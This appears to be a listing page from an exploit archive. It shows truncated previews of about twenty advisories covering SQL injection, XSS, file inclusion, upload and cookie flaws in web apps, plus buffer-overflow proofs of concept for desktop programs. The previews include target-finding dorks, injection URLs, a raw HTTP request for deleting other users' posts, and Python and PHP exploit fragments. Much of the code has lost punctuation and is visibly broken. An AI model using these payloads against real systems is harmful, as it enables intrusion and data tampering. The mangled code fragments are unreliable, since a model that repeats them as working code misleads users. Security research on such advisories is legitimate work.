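ThinkSNS V3 Flaw-02
Brief description: ThinkSNS V3 has been officially released, and congratulations are in order. This is not a submission to pad my numbers, just a friendly test (because our company is going to use it! Really going to use it!!) Details: Keywords: deletion of any user's microblog (feed) posts! The request to delete one's own microblog (feed) post is as follows: POST /t3/index.php?app=public&mod=Feed&act=removeFeed HTTP/1.1 Host: demo.thinksns.com User-Agent: Mozilla/5.0 Windows NT 6.1; rv:19.0 Gecko/20100101 Firefox/19.0 Accept: application/json,...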
Discuz NT file upload vulnerability in multiple versions
Affected versions: multiple versions seem to be affected. Vulnerable file: tools/ajax.aspx. Vulnerability analysis: the page that handles ajax requests performs no permission validation, so a user with guest permissions can call all of its methods. Writing it this way is dangerous, and it leads to the following vulnerabilities. ! Wh...
Priza Israel CMS 0.0.2 Cross Site Scripting / SQL Injection
Exploit Title: Priza Israel Cms SQL Injection / XSS Multiple Vulnerability Date: 2012-01-05 GMT +7 Author: BHG Security Center Software Link: http://www.priza.co.il/ Vendor Responses: They didn't respond to the emails. Dork: intext:"Powered by Priza" Version : 0.0.2 Tested on: ubuntu 11.04 CVE : ...
Shanghai Freemen SQL Injection
+Title : SHANGHAI FREEMEN Sql Injection +Vendor : http://www.shanghai-freemen.com/ +Author : Bl4ck.Viper Turkish Hacker +Email : [email protected] +Date : 01/07/2011 +Home : www.skote-vahshat.com Err0r 0n : hot.asp Exploit : http://target.com/products/hot.asp?id=SQL Demo :...
PHP Art Info SQL Injection
=============================================== PHP Art Info SQL Injection Vulnerability =============================================== +Title : PHP Art Info SQL Injection Vulnerability +Software : Art Info +Vendor : NN +Download : NN +Author : josalijoe +Contact : josalijoeathotmaildotcom +Web ...
waibrasil Remote / Local File Inclusion
Exploit for php platform in category web applications ======================================= waibrasil Remote / Local File Inclusion ======================================= Author: eXeSoul Vendor: www.waibrasil.com.br category: Remote Version: Web Application Tested on: Apache/Unix Code : exploi...
MovieLibrary 1.4.401 - '.dmv' Local Denial of Service
Exploit Title: MovieLibrary Local Dos .dmv file Date: April 14, 2010 Software Link: http://wensoftware.com/ Version: v1.4.401 Tested on: Windows XP SP3 Author: anonymous Site: www.setfreesecurity.com At the top: Click - New - Open Open the newly created dmv file Click File - Import Database Progr...
post Card ( catid ) Remote SQL Injection Vulnerability
Exploit for php platform in category web applications ====================================================== post Card catid Remote SQL Injection Vulnerability ====================================================== post Card catid Remote SQL Injection Vulnerability Author: Hussin X Home :...
Crimson Editor 3.70 SEH Overwrite
!/usr/bin/python Exploit Title : Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit Date : 21/03/2010 Author : mrme Bug found by : sharpe Version : 3.70 Release Tested on : XP SP3 En Reference : http://www.exploit-db.com/exploits/11803 Greetz to : Corelan Security Team & sharpe...
Arab Cart 1.0.2.0 Insecure Cookie Handling
======================================================================================== | Title : Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability | Author : indoushka | email : [email protected] | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | Web Sit...
phpunity.newsmanager LFI Vulnerability
Exploit for unknown platform in category web applications ====================================== phpunity.newsmanager LFI Vulnerability ====================================== Software Information + Vendor : http://www.perlunity.de/ + Download :...
YPOPS! v0.9.7.3 Buffer Overflow (SEH)
No description provided by source. Version:0.9.7.3 Tested on: Windows XP SP3 !/usr/bin/python All modules are SafeSEH protected in service pack 3. import socket, sys print "\n ========================================" print " YPOPS! v 0.9.7.3 Buffer Overflow SEH" print " Proof of Concept by Blake...
phpPowerCards 2.0 Cross Site Scripting
======================================================================================== | Title : phpPowerCards 2.0 Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | EDB-ID : ...
Squito Gallery 1.0 Cross Site Scripting
======================================================================================== | Title : Squito Gallery v.1.0 Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | EDB-ID...
PHPShop 0.6 - Bypass
PHPShop 0.6 - Bypass ======================================================================================== | Title : PHPShop Version 0.6 by pass Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | |...
PHP Uploader Downloader 2.0 - Arbitrary File Upload
PHP Uploader Downloader 2.0 - Arbitrary File Upload ======================================================================================== | Title : PHP Uploader Downloader Upload Shell Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum ...
Xion Audio Player 1.0 121 m3u file buffer overflow
Exploit for unknown platform in category local exploits ================================================== Xion Audio Player 1.0 121 m3u file buffer overflow ================================================== Title: Xion Audio Player 1.0 121 m3u file buffer overflow CVE-ID: OSVDB-ID: Author: Drag...
uTorrent 1.8.3 Buffer Overflow
!/usr/bin/env python uTorrent Create New Torrent - Paste string into "Source" field - Click "Add File" buff = "\x41" 9000 try: f1 = open"uTorrent.txt","w"; f1.writebuff; f1.close; print "\nuTorrent = 1.8.3 Build 15772 Create New Torrent Buffer Overflow PoC" print "By: DrIDE" print "\nFile Created...
Allomani Movies & Clips 2.7.0 - Blind SQL Injection
?php iniset"maxexecutiontime",0; printr' || || | || o,7 || . o7 || q||| o///, : / / . /QQQQQQQQQQQQQQQQQQQ\ q Allomani movies & Clips v2.7.0 /QQQ/\QQQ\ Blind SQL inj. exploit /QQQQQ/ \QQQQQQ\ q GET 3 /QQQQ/ QQQQ\ /QQQQ/ \QQQQ\ q http://allomani.com |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| Fr...
Teraway LinkTracker 1.0 Insecure Cookie
-------------------------------------+ Homepage:http://www.teraway.com Product: Teraway LinkTracker V1.0 home:www.h4ckf0ru.com Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae Note: The possible asked the impossible: "Where do you live?" It answered: "In the dreams of the helpless." ------------------------------------- Teraway LinkTracker V1.0 Insecur...